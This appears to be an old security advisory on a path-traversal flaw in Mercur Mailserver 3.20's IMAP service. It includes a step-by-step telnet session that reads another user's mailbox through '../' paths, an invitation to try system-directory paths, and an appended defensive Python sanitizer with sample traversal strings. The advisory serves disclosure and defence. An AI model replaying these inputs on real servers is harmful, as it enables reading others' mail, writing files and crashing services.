COMMAND
Mercur Mailserver
SYSTEMS AFFECTED
Atrium Mercur Mailserver 3.20
PROBLEM
Leonid Medevedv found the following. You can remotely read other
users' email, you can remotely fill up the server's HDD, you can
remotely put files anywhere on the server (at least on the drive
where mail is stored), and you can sometimes crash its IMAP service...
Simple scenario: remote user1 manages mail in user2's mailbox and
can even alter the filesystem anywhere on the server's HDD:
we>telnet target.mercur.mailserver 143
server>* OK MERCUR IMAP4-Server (v3.20.02 Unregistered) for Windows NT ready at Thu, 13 Apr 2000 20:08:31 +0400
we>000c login user1 password1
server>000c OK LOGIN completed
we>00ab select inbox/../../user2/inbox
server>* 1 EXISTS
server>* 0 RECENT
server>* OK [UNSEEN 0]
server>* OK [UIDVALIDITY 878969124]
server>* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
server>00ab OK [READ-WRITE] SELECT completed
we>000e uid fetch 1:*(rfc822.header rfc822.size uid flags internaldate)
server>* 1 FETCH (UID 879030620 RFC822.SIZE 867 FLAGS (\Seen) INTERNALDATE "12-Apr-2000 19:49:23 +0400")
server>* 2 FETCH (UID 879554127 RFC822.SIZE 1092 FLAGS (\Seen) INTERNALDATE "13-Apr-2000 19:46:19 +0400")
server>000e OK UID FETCH completed
we>000f uid fetch 879030620 (body.peek[] uid)
server> sends us user2 mail message
Voila! We can read ANY message in ANY known user's mailbox or
folder. But this is not the end :) Mobilize your own fantasy and
try other IMAP commands (especially those that create/delete
folders and send data to the server) with paths like "..\..\..\..\.."
or "..\..\..\..\..\WINNT\SYSTEM32" or anything...
You do not even need telnet, and can try some IMAP-compliant mail
clients. Btw, the Mercur IMAP service crashes some (not all) of
the time with paths containing dots and slashes.
SOLUTION
Nothing yet.
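
The session above works because the mailbox name from SELECT reaches the filesystem with its ".." components intact. The following is an added example, not code from the advisory or from the vendor: a sketch of the check a mail server needs before touching the disk. The storage layout, MAIL_ROOT and all function names are assumptions made for illustration, and the drive-letter check goes slightly beyond the cases the advisory lists.

```python
import posixpath

# Assumed layout for this sketch: <MAIL_ROOT>/<user>/<mailbox path>
MAIL_ROOT = "/var/mail/store"


class MailboxNameError(ValueError):
    """Raised when a client-supplied mailbox name must be refused."""


def resolve_mailbox(user, mailbox, mail_root=MAIL_ROOT):
    """Map an IMAP mailbox name to a path inside the user's own directory.

    `user` is assumed to be the already-authenticated login name.
    """
    # The advisory shows both '/' and '\' forms, so treat them alike.
    parts = mailbox.replace("\\", "/").split("/")
    for part in parts:
        # Empty parts cover absolute paths, doubled and trailing separators.
        if part in ("", ".", ".."):
            raise MailboxNameError("illegal path component in %r" % mailbox)
        # Drive letters / stream names and NUL bytes (extra hardening).
        if ":" in part or "\x00" in part:
            raise MailboxNameError("illegal character in %r" % mailbox)
    user_root = posixpath.join(mail_root, user)
    candidate = posixpath.normpath(posixpath.join(user_root, *parts))
    # Second line of defence: the normalised path must stay under the
    # user's root even if the component filter above is ever loosened.
    if posixpath.commonpath([user_root, candidate]) != user_root:
        raise MailboxNameError("%r escapes the user's mail root" % mailbox)
    return candidate


# Constructed sample names; the second and third are the forms quoted above.
SAMPLES = [
    "inbox",
    "inbox/../../user2/inbox",
    "..\\..\\..\\..\\..\\WINNT\\SYSTEM32",
    "lists/bugtraq",
    "C:\\WINNT",
]


def classify(names, user="user1"):
    """Return {name: resolved path, or None when the name is refused}."""
    results = {}
    for name in names:
        try:
            results[name] = resolve_mailbox(user, name)
        except MailboxNameError:
            results[name] = None
    return results


if __name__ == "__main__":
    for name, path in classify(SAMPLES).items():
        print("%-40r -> %s" % (name, path or "REFUSED"))
```

The same resolver has to sit in front of every command that takes a mailbox name (SELECT, CREATE, DELETE, RENAME, APPEND and so on), not only SELECT.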